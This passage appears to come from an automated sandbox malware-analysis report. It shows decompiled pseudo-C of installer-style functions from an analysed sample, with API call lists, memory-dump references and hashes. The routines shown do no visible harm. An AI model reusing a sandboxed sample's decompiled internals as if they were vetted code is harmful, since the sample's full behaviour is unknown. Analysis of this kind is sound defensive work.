				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                              0x00404e3f
                                                                                                                              0x00404e4c
                                                                                                                              0x00404e52
                                                                                                                              0x00404e90
                                                                                                                              0x00404e90
                                                                                                                              0x00404e9f
                                                                                                                              0x00404ea6
                                                                                                                              0x00000000
                                                                                                                              0x00404ea8
                                                                                                                              0x00404e54
                                                                                                                              0x00404e63
                                                                                                                              0x00404e6b
                                                                                                                              0x00404e6e
                                                                                                                              0x00404e80
                                                                                                                              0x00404e86
                                                                                                                              0x00404e8d
                                                                                                                              0x00000000
                                                                                                                              0x00404e8d
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                                                                                                                              • GetMessagePos.USER32 ref: 00404E54
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404E6E
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                              • String ID: f
                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                              • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                                                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                              • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x7936f8; // 0x4fcbb
					_t11 =  *0x79f704; // 0x4fcbf
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                              0x00402fa3
                                                                                                                              0x00402fb1
                                                                                                                              0x00402fb7
                                                                                                                              0x00402fb7
                                                                                                                              0x00402fc5
                                                                                                                              0x00402fc7
                                                                                                                              0x00402fcd
                                                                                                                              0x00402fd4
                                                                                                                              0x00402fd6
                                                                                                                              0x00402fd6
                                                                                                                              0x00402fec
                                                                                                                              0x00402ffc
                                                                                                                              0x0040300e
                                                                                                                              0x0040300e
                                                                                                                              0x00403016

                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                              • MulDiv.KERNEL32(0004FCBB,00000064,0004FCBF), ref: 00402FDC
                                                                                                                              • wsprintfW.USER32 ref: 00402FEC
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                              Strings
                                                                                                                              • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                              • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                                                                                              • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                                                                                                                              • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                                                                                              • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F002655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E6F002655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6F0012BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6F002784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6f00407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6f00409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6F001510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6f00506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6f00506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6f00506c);
								goto L17;
							case 5:
								_push( *0x6f00506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6f005000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6F001381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6F001312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                                                              0x6f00265f
                                                                                                                              0x6f002661
                                                                                                                              0x6f002665
                                                                                                                              0x6f002674
                                                                                                                              0x6f002678
                                                                                                                              0x6f00267d
                                                                                                                              0x6f00267d
                                                                                                                              0x6f002685
                                                                                                                              0x6f00268c
                                                                                                                              0x6f002692
                                                                                                                              0x00000000
                                                                                                                              0x6f002699
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0026a1
                                                                                                                              0x6f0026a5
                                                                                                                              0x6f0026a8
                                                                                                                              0x6f0026ac
                                                                                                                              0x6f0026b3
                                                                                                                              0x6f0026b7
                                                                                                                              0x6f0026bd
                                                                                                                              0x6f0026bf
                                                                                                                              0x6f0026c1
                                                                                                                              0x6f0026c1
                                                                                                                              0x6f0026c8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0026d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0026d8
                                                                                                                              0x6f0026de
                                                                                                                              0x6f0026e8
                                                                                                                              0x6f0026ee
                                                                                                                              0x6f0026f3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002714
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0026fa
                                                                                                                              0x6f002700
                                                                                                                              0x6f002701
                                                                                                                              0x6f002703
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00271c
                                                                                                                              0x6f00271e
                                                                                                                              0x6f002724
                                                                                                                              0x6f00272a
                                                                                                                              0x6f00272a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002692
                                                                                                                              0x6f00272d
                                                                                                                              0x6f00272d
                                                                                                                              0x6f002732
                                                                                                                              0x6f002743
                                                                                                                              0x6f002743
                                                                                                                              0x6f002749
                                                                                                                              0x6f00274e
                                                                                                                              0x6f002753
                                                                                                                              0x6f00275f
                                                                                                                              0x6f002764
                                                                                                                              0x00000000
                                                                                                                              0x6f002769
                                                                                                                              0x6f002755
                                                                                                                              0x6f002756
                                                                                                                              0x6f00276a
                                                                                                                              0x6f00276a
                                                                                                                              0x6f002753
                                                                                                                              0x6f00276b
                                                                                                                              0x6f00276c
                                                                                                                              0x6f00276f
                                                                                                                              0x6f002783

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 6F0012BB: GlobalAlloc.KERNELBASE(00000040,?,6F0012DB,?,6F00137F,00000019,6F0011CA,-000000A0), ref: 6F0012C5
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F002743
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F002778
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1780285237-0
                                                                                                                              • Opcode ID: 38fe016bcf89d344865b0cf4b656061192d7e979055714b23c4b3d2842efbc5d
                                                                                                                              • Instruction ID: 5e0b3f9ca696ca73dd8aa2844fb6401153c2641d920ce45494f7f56fd7aec15b
                                                                                                                              • Opcode Fuzzy Hash: 38fe016bcf89d344865b0cf4b656061192d7e979055714b23c4b3d2842efbc5d
                                                                                                                              • Instruction Fuzzy Hash: F931FE75108A01EFEB25AF68CD88F2E77B6FB87318710422DF24493260C7346825AB69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E60(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FE5(_t55);
				_t29 = E0040600A(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8a74;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034C2(_t49);
							E004034AC(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                              0x00402950
                                                                                                                              0x00402952
                                                                                                                              0x00402957
                                                                                                                              0x0040295c
                                                                                                                              0x0040295f
                                                                                                                              0x00402969
                                                                                                                              0x0040296d
                                                                                                                              0x0040296d
                                                                                                                              0x00402973
                                                                                                                              0x00402980
                                                                                                                              0x00402988
                                                                                                                              0x0040298b
                                                                                                                              0x00402997
                                                                                                                              0x0040299a
                                                                                                                              0x004029a0
                                                                                                                              0x004029ae
                                                                                                                              0x004029b3
                                                                                                                              0x004029b7
                                                                                                                              0x004029ba
                                                                                                                              0x004029c3
                                                                                                                              0x004029cf
                                                                                                                              0x004029d3
                                                                                                                              0x004029d6
                                                                                                                              0x004029e0
                                                                                                                              0x004029ff
                                                                                                                              0x004029ec
                                                                                                                              0x004029f4
                                                                                                                              0x004029f7
                                                                                                                              0x004029fc
                                                                                                                              0x004029fc
                                                                                                                              0x00402a06
                                                                                                                              0x00402a06
                                                                                                                              0x00402a13
                                                                                                                              0x00402a19
                                                                                                                              0x00402a1f
                                                                                                                              0x00402a1f
                                                                                                                              0x004029b7
                                                                                                                              0x00402a33
                                                                                                                              0x00402a35
                                                                                                                              0x00402a35
                                                                                                                              0x00402a3f
                                                                                                                              0x00402a40
                                                                                                                              0x00402a44
                                                                                                                              0x00402a48
                                                                                                                              0x00402a4e
                                                                                                                              0x00402a4e
                                                                                                                              0x00402a55
                                                                                                                              0x004022f1
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2667972263-0
                                                                                                                              • Opcode ID: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                                                                                                                              • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                                                                                                                              • Opcode Fuzzy Hash: 120012c0658411ce1531804f947d12fcad7357e09ece28a0d9f1d195cd4c3617
                                                                                                                              • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F002480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E6F002480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6F00135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6F0012E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6F0025F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6F0013B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E6F0013B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6f00506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6f00506c, __eax,  *0x6f00506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6F0012CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6F0013B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6f00506c =  *0x6f005074 + ( *(__esi + 0x18) - 1) *  *0x6f00506c * 2 + 0x18;
									 *__ebx =  *0x6f005074 + ( *(__esi + 0x18) - 1) *  *0x6f00506c * 2 + 0x18;
									asm("cdq");
									__eax = E6F001510(__edx,  *0x6f005074 + ( *(__esi + 0x18) - 1) *  *0x6f00506c * 2 + 0x18, __edx,  *0x6f005074 + ( *(__esi + 0x18) - 1) *  *0x6f00506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6F0012CC(0x6f005044);
					goto L10;
				}
			}











                                                                                                                              0x6f002494
                                                                                                                              0x6f002498
                                                                                                                              0x6f0024a3
                                                                                                                              0x6f0024a3
                                                                                                                              0x6f0024aa
                                                                                                                              0x6f0024af
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0024b3
                                                                                                                              0x6f0024b6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0024bb
                                                                                                                              0x6f0024c6
                                                                                                                              0x6f0024d6
                                                                                                                              0x00000000
                                                                                                                              0x6f0024cd
                                                                                                                              0x6f0024cf
                                                                                                                              0x6f0024e5
                                                                                                                              0x00000000
                                                                                                                              0x6f0024e5
                                                                                                                              0x6f0024bd
                                                                                                                              0x6f0024bd
                                                                                                                              0x6f0024e6
                                                                                                                              0x6f0024e6
                                                                                                                              0x6f0024e8
                                                                                                                              0x6f0024ec
                                                                                                                              0x6f0024ec
                                                                                                                              0x6f0024ef
                                                                                                                              0x6f0024ef
                                                                                                                              0x6f0024f7
                                                                                                                              0x6f0024ff
                                                                                                                              0x6f002502
                                                                                                                              0x6f0025c1
                                                                                                                              0x6f0025c2
                                                                                                                              0x6f0025cd
                                                                                                                              0x6f0025f7
                                                                                                                              0x6f0025f7
                                                                                                                              0x6f0025dd
                                                                                                                              0x6f0025e9
                                                                                                                              0x6f0025df
                                                                                                                              0x6f0025df
                                                                                                                              0x6f0025df
                                                                                                                              0x00000000
                                                                                                                              0x6f002508
                                                                                                                              0x6f002508
                                                                                                                              0x00000000
                                                                                                                              0x6f00250f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002517
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002525
                                                                                                                              0x6f002527
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002548
                                                                                                                              0x6f00254e
                                                                                                                              0x6f002551
                                                                                                                              0x6f002553
                                                                                                                              0x6f002563
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002530
                                                                                                                              0x6f002535
                                                                                                                              0x6f002538
                                                                                                                              0x6f002539
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00256f
                                                                                                                              0x6f002575
                                                                                                                              0x6f002576
                                                                                                                              0x6f002579
                                                                                                                              0x6f00257a
                                                                                                                              0x6f00257c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002588
                                                                                                                              0x6f00258b
                                                                                                                              0x6f002597
                                                                                                                              0x6f002599
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f0025a5
                                                                                                                              0x6f0025b1
                                                                                                                              0x6f0025b4
                                                                                                                              0x6f0025b6
                                                                                                                              0x6f0025b9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f002508
                                                                                                                              0x6f002502
                                                                                                                              0x6f0024db
                                                                                                                              0x6f0024e0
                                                                                                                              0x00000000
                                                                                                                              0x6f0024e0

                                                                                                                              APIs
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F0025C2
                                                                                                                                • Part of subcall function 6F0012CC: lstrcpynW.KERNEL32(00000000,?,6F00137F,00000019,6F0011CA,-000000A0), ref: 6F0012DC
                                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 6F002548
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F002563
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
